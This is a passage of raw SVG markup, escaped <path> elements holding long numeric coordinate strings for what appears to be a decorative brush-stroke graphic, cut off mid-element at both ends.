d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path 